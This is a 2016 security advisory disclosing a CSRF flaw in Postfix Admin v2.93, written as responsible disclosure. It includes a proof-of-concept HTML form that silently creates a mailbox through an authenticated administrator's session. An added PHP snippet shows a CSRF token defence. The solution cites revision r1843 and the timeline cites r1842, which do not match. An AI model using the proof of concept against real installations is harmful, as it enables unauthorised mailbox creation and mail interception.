https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Postfix Admin
Vendor URL: sourceforge.net/projects/postfixadmin/
Type: Cross-Site Request Forgery [CWE-352]
Date found: 2016-04-23
Date published: 2016-05-21
CVSSv3 Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Postfix Admin v2.93 (latest)
older versions may be affected too.
4. INTRODUCTION
===============
Postfix Admin is a web-based management tool created for Postfix. It is a
PHP-based application that handles Postfix-style virtual domains and users
that are stored in MySQL or PostgreSQL.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Postfix Admin exposes its configuration functions via both HTTP GET and
HTTP POST. GET-based operations such as deleting a mailbox are protected by
a CSRF token passed in a parameter named "token", but the POST-based
functions, among them adding email forwarding settings, adding new
mailboxes and adding aliases, perform no token check at all and are
therefore vulnerable to CSRF attacks.
The following proof of concept triggers the vulnerability and adds a new
mailbox when the page is loaded by an authenticated administrator:
<html>
  <body>
    <!-- Target: the unprotected POST handler in edit.php. The victim must
         hold an authenticated Postfix Admin session in the same browser,
         so the session cookie is attached to the forged request. -->
    <form
      action="https://localhost/edit.php?table=mailbox&domain=localhost.com"
      method="POST">
      <input type="hidden" name="table" value="mailbox" />
      <input type="hidden" name="value[local_part]" value="test1234" />
      <input type="hidden" name="value[domain]" value="localhost.com" />
      <input type="hidden" name="value[password]" value="rcesec" />
      <input type="hidden" name="value[password2]" value="rcesec" />
      <input type="hidden" name="value[name]" value="rcesec" />
      <input type="hidden" name="value[quota]" value="10000" />
      <input type="hidden" name="value[active]" value="1" />
      <input type="hidden" name="submit" value="Add Mailbox" />
      <!-- No "token" field is needed: the POST handler never checks one. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
6. RISK
=======
To exploit this vulnerability, a victim who holds an authenticated Postfix
Admin session must be lured to an attacker-controlled web page; the browser
then attaches the session cookie to the forged POST request. Both account
types (mailbox users and administrators) are affected, but for a mailbox
user the only reachable function is adding email forwarding settings.
The vulnerability allows a remote attacker to perform sensitive actions,
such as adding new mailboxes or email forwardings, in the authentication
context of the targeted user.
7. SOLUTION
===========
Check out the latest SVN trunk, which includes the fix ([r1843]).
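The pattern the advisory describes is a token check applied to the GET handlers but not to the POST handlers. The following added example (not Postfix Admin code, and not the vendor's patch) shows a minimal per-session CSRF token scheme in PHP that covers both request methods: the function names csrf_token(), csrf_check() and require_csrf_token(), the hidden field name "token" and the edit.php-style form are assumptions for illustration. With require_csrf_token() placed in front of the POST branch, the proof of concept from section 5 receives a 403 instead of creating a mailbox, because the attacker's page never learns the victim's session token.

```php
<?php
// Added example (not Postfix Admin code): a minimal CSRF-token scheme that
// protects GET- and POST-based state changes alike. Function and field
// names (csrf_token(), csrf_check(), "token") are assumptions.
declare(strict_types=1);

session_start();

// Create the per-session token once: 32 random bytes, hex-encoded.
function csrf_token(): string
{
    if (empty($_SESSION['token'])) {
        $_SESSION['token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['token'];
}

// Validate a submitted token with a constant-time comparison. Returns true
// only if the session already has a token and the submitted value matches.
function csrf_check(?string $submitted): bool
{
    if (empty($_SESSION['token']) || $submitted === null) {
        return false;
    }
    return hash_equals($_SESSION['token'], $submitted);
}

// Reject any state-changing request, regardless of method, that lacks a
// valid token. The advisory's point is that this check existed for the GET
// actions but was absent from the POST handlers.
function require_csrf_token(): void
{
    $submitted = $_POST['token'] ?? $_GET['token'] ?? null;
    if (!csrf_check($submitted)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// Form rendering: the hidden "token" field is the value a cross-site form
// cannot supply, since the attacker's page never sees the victim's session.
function render_add_mailbox_form(string $action): string
{
    $token  = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    $action = htmlspecialchars($action, ENT_QUOTES, 'UTF-8');
    return <<<HTML
<form action="{$action}" method="POST">
  <input type="hidden" name="token" value="{$token}">
  <input type="text" name="value[local_part]">
  <input type="password" name="value[password]">
  <input type="submit" name="submit" value="Add Mailbox">
</form>
HTML;
}

// Request handling. The vulnerable version is this same branch without the
// require_csrf_token() call: the forged POST from section 5 would be
// accepted on the strength of the session cookie alone.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    require_csrf_token();   // the check the POST handlers were missing
    // ... validate $_POST['value'] and create the mailbox here ...
    echo 'Mailbox created';
} else {
    echo render_add_mailbox_form('/edit.php?table=mailbox');
}
```

Two practical notes. First, the token must be compared with hash_equals() rather than ==, so that a timing side channel cannot be used to recover it byte by byte. Second, setting the session cookie with SameSite=Lax or Strict stops a cross-site POST in modern browsers and is worth enabling as defence in depth, but browser support was not dependable in 2016 and the token check remains the portable fix.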
8. REPORT TIMELINE
==================
2016-04-23: Discovery of the vulnerability
2016-04-23: Created https://sourceforge.net/p/postfixadmin/bugs/372/
2016-05-20: Vendor committed patch to SVN trunk r1842
2016-05-21: Advisory released
9. REFERENCES
=============
https://sourceforge.net/p/postfixadmin/bugs/372/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQIcBAEBCAAGBQJXQC5pAAoJELLTnL9hzYr62yMP/RtPNSlQseKc+lcpCtVJquFt
1tyAy2g946n6ouSAVq3g40LEFDtkxCkQe3o/39Bp/4uX3S6b7vz0yJGBzw6qj/4R
lN/zprCuob09JMEagHv65TeZuZFx4f3D2YOTk6LwTifczFJM2oYbskpixIC1OlAt
ne+ix5Q6LUa5GjD/1KlqhJKF7LQ+WcQiIhhvq3lwt+vntu69H2GhHEj057mNLRQp
XVhsxzZnr8gFBvED8GmdJwIoFAZAb01k2MTi0qYXywUZF9Cw6PdUsnr6tZEJslPk
tMijPz1bu+tAyoSY7euPnQ8NQYKNndQTivF8gwfCMYvmLij7TebJSCPLYcfhhNs8
U7vxzQsA4AQXxhDMiIsQDU9ZBMS4e+3OwLiScjlKR/Nz6eEEizHhF77SawcRecV7
tw8VQlOABoMVaLoPcu2gCsQ4qVQHEpYIP6wlWStVhHS6AeTYTit685SqBulK0xLY
9qIN00LFi1sF8yAlCygGYR7AwtThBRyC4W9zARw/1jbcLBpvaN0+6qx6nVfIwvqU
CHYVba1a1FNBgY2CivExhDNjzwltj6XoDF7KW0O1RlyZep46SgEpK7zTAzEZ13rj
7XUxbt9zGU+CwRZaYxQ3KRkQ6ZVh9Z4AvfRmrygDUFHmSRflHZmbD0fpCAxNxJkV
p0Qn2vBWa3uQZORzgKBz
=KOJI
-----END PGP SIGNATURE-----